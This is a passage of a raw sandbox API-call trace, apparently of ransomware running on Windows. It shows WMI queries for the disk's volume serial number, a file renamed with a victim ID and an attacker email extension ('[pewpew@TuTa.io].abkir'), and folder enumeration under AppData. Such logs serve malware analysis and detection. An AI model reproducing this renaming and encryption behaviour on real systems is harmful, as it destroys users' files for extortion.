ppvObject=0x949e954 | out: ppvObject=0x949e954*=0x60248d0) returned 0x0 [0147.474] WbemLocator:IUnknown:AddRef (This=0x60248d0) returned 0x3 [0147.474] WbemLocator:IUnknown:Release (This=0x60248d0) returned 0x2 [0147.474] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025680, puCount=0x949eaec | out: puCount=0x949eaec*=0x2) returned 0x0 [0147.474] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=8, puBuffLength=0x949eae8*=0x0, pszText=0x0 | out: puBuffLength=0x949eae8*=0xf, pszText=0x0) returned 0x0 [0147.474] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=8, puBuffLength=0x949eae8*=0xf, pszText="00000000000000" | out: puBuffLength=0x949eae8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0147.474] CoCreateInstance (in: rclsid=0x749b1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x749b12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x949e9c4 | out: ppv=0x949e9c4*=0x6024930) returned 0x0 [0147.474] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6024930, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x949ea58 | out: ppNamespace=0x949ea58*=0x601ccec) returned 0x0 [0148.130] WbemLocator:IUnknown:QueryInterface (in: This=0x601ccec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e8f4 | out: ppvObject=0x949e8f4*=0xb5ad74) returned 0x0 [0148.130] WbemLocator:IClientSecurity:QueryBlanket (in: This=0xb5ad74, pProxy=0x601ccec, pAuthnSvc=0x949e944, pAuthzSvc=0x949e940, pServerPrincName=0x949e938, pAuthnLevel=0x949e93c, pImpLevel=0x949e92c, pAuthInfo=0x949e930, pCapabilites=0x949e934 | out: pAuthnSvc=0x949e944*=0xa, pAuthzSvc=0x949e940*=0x0, pServerPrincName=0x949e938, pAuthnLevel=0x949e93c*=0x6, pImpLevel=0x949e92c*=0x2, pAuthInfo=0x949e930, pCapabilites=0x949e934*=0x1) returned 0x0 [0148.130] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x1 [0148.130] WbemLocator:IUnknown:QueryInterface (in: This=0x601ccec, riid=0x749b10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e8e8 | out: ppvObject=0x949e8e8*=0xb5ad94) returned 0x0 [0148.131] WbemLocator:IUnknown:QueryInterface (in: This=0x601ccec, riid=0x749b1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e8e4 | out: ppvObject=0x949e8e4*=0xb5ad74) returned 0x0 [0148.131] WbemLocator:IClientSecurity:SetBlanket (This=0xb5ad74, pProxy=0x601ccec, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0148.131] WbemLocator:IUnknown:Release (This=0xb5ad74) returned 0x2 [0148.131] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x1 [0148.131] CoTaskMemFree (pv=0xbd4a08) [0148.131] WbemLocator:IUnknown:Release (This=0x6024930) returned 0x0 [0148.131] WbemLocator:IUnknown:QueryInterface (in: This=0x601ccec, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e4e4 | out: ppvObject=0x949e4e4*=0xb5ad94) returned 0x0 [0148.131] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x949e4a0 | out: ppvObject=0x949e4a0*=0x0) returned 0x80004002 [0148.131] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x949e2bc | out: ppvObject=0x949e2bc*=0x0) returned 0x80004002 [0148.132] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0148.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x949ddfc | out: ppvObject=0x949ddfc*=0x0) returned 0x80004002 [0148.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x949ddac | out: ppvObject=0x949ddac*=0x0) returned 0x80004002 [0148.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949ddb8 | out: ppvObject=0x949ddb8*=0xb5acf4) returned 0x0 [0148.132] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0xb5acf4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x949ddc0 | out: pCid=0x949ddc0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0148.132] WbemLocator:IUnknown:Release (This=0xb5acf4) returned 0x3 [0148.132] CoGetContextToken (in: pToken=0x949de18 | out: pToken=0x949de18) returned 0x0 [0148.132] CoGetContextToken (in: pToken=0x949e220 | out: pToken=0x949e220) returned 0x0 [0148.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e2b0 | out: ppvObject=0x949e2b0*=0xb5ad7c) returned 0x0 [0148.132] WbemLocator:IRpcOptions:Query (in: This=0xb5ad7c, pPrx=0xb5ad94, dwProperty=2, pdwValue=0x949e2d8 | out: pdwValue=0x949e2d8) returned 0x80004002 [0148.132] WbemLocator:IUnknown:Release (This=0xb5ad7c) returned 0x3 [0148.132] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0148.132] CoGetContextToken (in: pToken=0x949e7f8 | out: pToken=0x949e7f8) returned 0x0 [0148.132] CoGetContextToken (in: pToken=0x949e758 | out: pToken=0x949e758) returned 0x0 [0148.132] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x949e828*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x949e824 | out: ppvObject=0x949e824*=0x601ccec) returned 0x0 [0148.133] WbemLocator:IUnknown:AddRef (This=0x601ccec) returned 0x4 [0148.133] WbemLocator:IUnknown:Release (This=0x601ccec) returned 0x3 [0148.133] WbemLocator:IUnknown:Release (This=0x601ccec) returned 0x2 [0148.133] SysStringLen (param_1=0x0) returned 0x0 [0148.133] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x60256f0, puCount=0x949ebbc | out: puCount=0x949ebbc*=0x0) returned 0x0 [0148.133] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebb8*=0x0, pszText=0x0 | out: puBuffLength=0x949ebb8*=0x20, pszText=0x0) returned 0x0 [0148.133] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebb8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ebb8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.133] CoGetContextToken (in: pToken=0x949e828 | out: pToken=0x949e828) returned 0x0 [0148.133] WbemLocator:IUnknown:AddRef (This=0xb5ad94) returned 0x3 [0148.133] WbemLocator:IUnknown:QueryInterface (in: This=0xb5ad94, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x949e6bc | out: ppvObject=0x949e6bc*=0xb5ad94) returned 0x0 [0148.133] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x3 [0148.133] WbemLocator:IUnknown:Release (This=0xb5ad94) returned 0x2 [0148.133] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebc0*=0x0, pszText=0x0 | out: puBuffLength=0x949ebc0*=0x20, pszText=0x0) returned 0x0 [0148.133] WbemDefPath:IWbemPath:GetText (in: This=0x60256f0, lFlags=2, puBuffLength=0x949ebc0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x949ebc0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0148.133] IWbemServices:GetObject (in: This=0x601ccec, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x949eb74*=0x0, ppCallResult=0x0 | out: ppObject=0x949eb74*=0x6027fe8, ppCallResult=0x0) returned 0x0 [0148.476] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6025680, puCount=0x949eb74 | out: puCount=0x949eb74*=0x2) returned 0x0 [0148.476] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=4, puBuffLength=0x949eb70*=0x0, pszText=0x0 | out: puBuffLength=0x949eb70*=0xf, pszText=0x0) returned 0x0 [0148.476] WbemDefPath:IWbemPath:GetText (in: This=0x6025680, lFlags=4, puBuffLength=0x949eb70*=0xf, pszText="00000000000000" | out: puBuffLength=0x949eb70*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0148.476] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949eb70*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x368e8b4*=0, plFlavor=0x368e8b8*=0 | out: pVal=0x949eb70*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x368e8b4*=8, plFlavor=0x368e8b8*=0) returned 0x0 [0148.476] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.476] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.476] IWbemClassObject:Get (in: This=0x6027fe8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x949eb78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x368e8b4*=8, plFlavor=0x368e8b8*=0 | out: pVal=0x949eb78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x368e8b4*=8, plFlavor=0x368e8b8*=0) returned 0x0 [0148.476] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.476] SysStringByteLen (bstr="9C354B42") returned 0x10 [0148.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", nBufferLength=0x105, lpBuffer=0x949e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT", lpFilePart=0x0) returned 0x3f [0148.476] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[pewpew@TuTa.io].abkir", nBufferLength=0x105, lpBuffer=0x949e778, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[pewpew@TuTa.io].abkir", lpFilePart=0x0) returned 0x62 [0148.476] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ebd8) returned 1 [0148.477] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), fInfoLevelId=0x0, lpFileInformation=0x949ec54 | out: lpFileInformation=0x949ec54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x66051ca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x66051ca0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x15b67b20, ftLastWriteTime.dwHighDateTime=0x1d68bad, nFileSizeHigh=0x0, nFileSizeLow=0x20)) returned 1 [0148.477] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ebd4) returned 1 [0148.477] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\GDIPFONTCACHEV1.DAT.id-9C354B42.[pewpew@TuTa.io].abkir" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\gdipfontcachev1.dat.id-9c354b42.[pewpew@tuta.io].abkir")) returned 1 [0149.123] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0149.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x31 [0149.123] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpFilePart=0x0) returned 0x32 [0149.123] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.123] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.124] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0149.124] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0149.124] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 0 [0149.124] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0149.124] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0149.124] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949eccc) returned 1 [0149.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", nBufferLength=0x105, lpBuffer=0x949e7d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe", lpFilePart=0x0) returned 0x31 [0149.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", nBufferLength=0x105, lpBuffer=0x949e7a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\", lpFilePart=0x0) returned 0x32 [0149.124] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\*", lpFindFileData=0x949e9f4 | out: lpFindFileData=0x949e9f4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.125] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.125] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Acrobat", cAlternateFileName="")) returned 1 [0149.125] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce60f420, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xce60f420, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Color", cAlternateFileName="")) returned 1 [0149.125] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949ea04 | out: lpFindFileData=0x949ea04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0149.125] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec8c) returned 1 [0149.125] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec98) returned 1 [0149.125] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0149.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x39 [0149.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x3a [0149.126] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.126] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0149.126] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 1 [0149.126] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd72eaa0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xee135b70, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xee135b70, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="10.0", cAlternateFileName="")) returned 0 [0149.126] FindClose (in: hFindFile=0xb7f750 | out: hFindFile=0xb7f750) returned 1 [0149.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec3c) returned 1 [0149.126] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x949ec48) returned 1 [0149.127] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x949ec7c) returned 1 [0149.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", nBufferLength=0x105, lpBuffer=0x949e784, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat", lpFilePart=0x0) returned 0x39 [0149.127] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", nBufferLength=0x105, lpBuffer=0x949e758, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\", lpFilePart=0x0) returned 0x3a [0149.127] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Adobe\\Acrobat\\*", lpFindFileData=0x949e9a4 | out: lpFindFileData=0x949e9a4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xb7f750 [0149.127] FindNextFileW (in: hFindFile=0xb7f750, lpFindFileData=0x949e9b4 | out: lpFindFileData=0x949e9b4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xcd72eaa0, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xcd72eaa0, ftLastWriteTime.dwHighDateTime=0x1d2dda0, nFileSizeHigh=0x0, 